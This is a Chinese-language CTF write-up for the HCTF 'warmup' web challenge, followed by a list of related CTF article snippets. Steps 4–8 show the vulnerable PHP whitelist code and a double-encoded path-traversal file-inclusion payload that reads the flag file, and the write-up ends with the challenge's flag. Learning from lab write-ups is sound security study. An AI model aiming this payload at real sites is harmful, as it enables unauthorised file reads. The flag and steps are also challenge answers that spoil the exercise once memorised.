CTF warmup

news/2024/10/17 20:32:33/

难度系数: ★★
题目来源: HCTF
题目描述: 暂无
题目场景: http://220.249.52.133:38343 (温馨提示:每次进入URL的端口号都不一样)

1、点击链接进入如下界面
在这里插入图片描述
2、查看源代码(按F12或F12+Fn),出现以下代码。

<!DOCTYPE html>
<html lang="en">
<head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta http-equiv="X-UA-Compatible" content="ie=edge"><title>Document</title>
</head>
<body><!--source.php--><br><img src="https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg" /></body>
</html>

3、发现了“source.php”

则在链接后面加上“/source.php”

既是http://220.249.52.133:38343/source.php

4、输入URL之后,跳出以下信息

<?phphighlight_file(__FILE__);class emmm{public static function checkFile(&$page){$whitelist = ["source"=>"source.php","hint"=>"hint.php"];if (! isset($page) || !is_string($page)) {echo "you can't see it";return false;}if (in_array($page, $whitelist)) {return true;}$_page = mb_substr($page,0,mb_strpos($page . '?', '?'));if (in_array($_page, $whitelist)) {return true;}$_page = urldecode($page);$_page = mb_substr($_page,0,mb_strpos($_page . '?', '?'));if (in_array($_page, $whitelist)) {return true;}echo "you can't see it";return false;}}if (! empty($_REQUEST['file'])&& is_string($_REQUEST['file'])&& emmm::checkFile($_REQUEST['file'])) {include $_REQUEST['file'];exit;} else {echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";}  
?>

在这里插入图片描述

5、发现了关键信息

$whitelist = [“source”=>“source.php”,“hint”=>“hint.php”];

在这里插入图片描述

6、在链接后加上/hint.php

URL: http://220.249.52.133:38343/hint.php

7、输入URL,出现以下信息

在这里插入图片描述
8、然后构造payload

?file=source.php%253f/../../../../ffffllllaaaagggg
URL: http://220.249.52.133:38343/source.php?file=source.php%253f/../../../../ffffllllaaaagggg

这样也可以,等等!

在这里插入图片描述

9、找到flag

在这里插入图片描述
10、OK

flag{25e7bce6005c4e0c983fb97297ac6e5a}


http://www.ppmy.cn/news/462052.html

相关文章

CTF ics-04

难度系数&#xff1a; ★★★★ 题目来源&#xff1a; XCTF 4th-CyberEarth 题目描述&#xff1a; 工控云管理系统新添加的登录和注册页面存在漏洞&#xff0c;请找出flag。 题目场景&#xff1a; http://220.249.52.133:52962&#xff08;温馨提示&#xff1a;每次进入URL的端…

CTF 学习笔记

文章目录 一&#xff0c;CTF&#xff08;Capture The Flag&#xff09;1 CTF简介2 CTF赛事2.1 国家赛事2.2 国内赛事 3 CTF意义4 CTF学习4.1 竞赛模式4.2 题目类型4.3 学习建议 二&#xff0c;CTF题目案例三&#xff0c;CTF靶机实战一步步拿下WordPres1 实验环境1.1 WordPress简…

CTF supersqli

题目来源&#xff1a; 强网杯 2019 题目描述&#xff1a; 随便注 题目场景&#xff1a; http://220.249.52.133:31334 &#xff08;温馨提示&#xff1a;每次进入URL的端口号都不一样&#xff09; 1、点击链接进入如下界面 2、‘1’—>提交 3、使用union select 爆字段 …

CTF easycap Banmabanma

文章目录 一、easycap二、Banmabanma 一、easycap 难度系数&#xff1a; ★★ 题目来源&#xff1a; bsidessf-ctf-2017 题目描述&#xff1a; 你能从截取的数据包中得到flag吗&#xff1f; 题目附件&#xff1a; 附件1 1、附件1 链接&#xff1a;https://pan.baidu.com/s/1…

CTF Broadcast

题目来源&#xff1a; 2019_Redhat 题目描述&#xff1a; 粗心的Alice在制作密码的时候&#xff0c;把明文留下来&#xff0c;聪明的你能快速找出来吗&#xff1f; 题目附件&#xff1a; 附件1 1、 附件1 2、解压后 3、选中“task.py”—>打开 4、可直接找到flag #!/…

CTF mysql

难度系数&#xff1a; ★★★★★ 题目来源&#xff1a; XCTF 题目描述&#xff1a; 我们在Mysql数据库中存放了flag&#xff0c;但是黑客已经把它删除了。你能找回来flag吗&#xff1f; 题目场景&#xff1a; 暂无 题目附件&#xff1a; 附件1 1、附件1 链接&#xff1a;htt…

CTFHub Linux 动态加载器

查看环境 先给了755 他自己传了flag 等于告诉我们在哪了 然后限到了644 不想让我们直接看 都到这一题了权限应该不用讲了 提示给了shell 且不需要提权 于是需要新学一个东西 动态加载 Linux ELF Dynaamic Loader elf文件 elf文件是linux下的可执行文件 文件头为elf 不知道…

CTFHub Linux 动态加载

CTFHub Linux 动态加载 观察页面&#xff0c;写着没有 x权限&#xff0c;说明我们没有办法执行根目录下的 elf 文件 readflag&#xff0c;所以我们无法利用下方的 webshell 获取flag&#xff08;我们的权限不够&#xff09; 我们发现无法访问到 flag Linux 下 x(eXecute,执行)…